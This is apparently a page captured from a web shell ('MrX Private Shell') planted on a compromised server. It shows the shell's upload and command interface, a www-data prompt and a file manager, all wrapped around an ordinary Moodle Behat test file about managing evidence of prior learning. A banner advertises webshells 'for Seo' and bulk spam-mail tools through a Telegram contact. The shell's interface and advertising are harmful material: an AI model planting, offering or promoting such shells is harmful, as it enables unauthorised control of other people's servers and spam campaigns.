__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
@tool @javascript @tool_lp @tool_lp_user_evidence
Feature: Manage evidence of prior learning
  In order to perform CRUD operations on evidence of prior learning
  As a user
  I need to create, update and delete evidence of prior learning

  Background:
    Given the following "users" exist:
      | username | firstname | lastname | email |
      |user1 | User | 1 | user1@example.com |
    When I log in as "user1"
    And I follow "Profile" in the user menu
    And I follow "Learning plans"
    Then I should see "Evidence of prior learning"

  Scenario: Create a new evidence of prior learning
    Given I follow "Evidence of prior learning"
    And I should see "List of evidence"
    When I click on "Add new evidence" "button"
    And I set the field "Name" to "Evidence-1"
    And I set the field "Description" to "Evidence-1 description"
    And I press "Save changes"
    Then I should see "Evidence of prior learning created"
    And I should see "Evidence-1"

  Scenario: Read an evidence of prior learning
    Given the following lp "userevidence" exist:
      | name | description | user |
      | Evidence-2 | Evidence-2 description | user1 |
    And I follow "Evidence of prior learning"
    And I should see "List of evidence"
    And I should see "Evidence-2"
    When I click on "Evidence-2" "link"
    Then I should see "Evidence-2"

  Scenario: Edit an evidence of prior learning
    Given the following lp "userevidence" exist:
      | name | description | user |
      | Evidence-3 | Evidence-3 description | user1 |
    And I follow "Evidence of prior learning"
    And I should see "List of evidence"
    And I click on "Edit" of edit menu in the "Evidence-3" row
    And the field "Name" matches value "Evidence-3"
    When I set the field "Name" to "Evidence-3 Edited"
    And I press "Save changes"
    Then I should see "Evidence of prior learning updated"
    And I should see "Evidence-3 Edited"

  Scenario: Delete an evidence of prior learning
    Given the following lp "userevidence" exist:
      | name | description | user |
      | Evidence-4 | Evidence-4 description | user1 |
    And I follow "Evidence of prior learning"
    And I should see "List of evidence"
    And I click on "Delete" of edit menu in the "Evidence-4" row
    And I click on "Cancel" "button" in the "Confirm" "dialogue"
    And I click on "Delete" of edit menu in the "Evidence-4" row
    And "Confirm" "dialogue" should be visible
    When I click on "Delete" "button" in the "Confirm" "dialogue"
    And I wait until the page is ready
    Then I should not see "Evidence-4"

  Scenario: List evidences of prior learning
    Given the following "users" exist:
      | username | firstname | lastname | email |
      |user2 | User | 2 | user2@example.com |
    And the following lp "userevidence" exist:
      | name | description | user |
      | Evidence-5 | Evidence-5 description | user1 |
      | Evidence-6 | Evidence-6 description | user2 |
    And I follow "Evidence of prior learning"
    And I should see "List of evidence"
    And I should see "Evidence-5"
    When I log out
    And I log in as "user2"
    And I follow "Profile" in the user menu
    And I follow "Learning plans"
    And I follow "Evidence of prior learning"
    Then I should see "List of evidence"
    And I should see "Evidence-6"
    And I should not see "Evidence-5"

Filemanager

Name Type Size Permission Actions
behat_tool_lp.php File 5.46 KB 0777
behat_tool_lp_data_generators.php File 12.48 KB 0777
course_competencies.feature File 2.86 KB 0777
framework_crud.feature File 6.22 KB 0777
plan_crud.feature File 7.04 KB 0777
plan_workflow.feature File 8.62 KB 0777
template_crud.feature File 2.93 KB 0777
user_evidence_comp_link.feature File 2.95 KB 0777
user_evidence_crud.feature File 3.29 KB 0777
view_competencies.feature File 9.49 KB 0777
Filemanager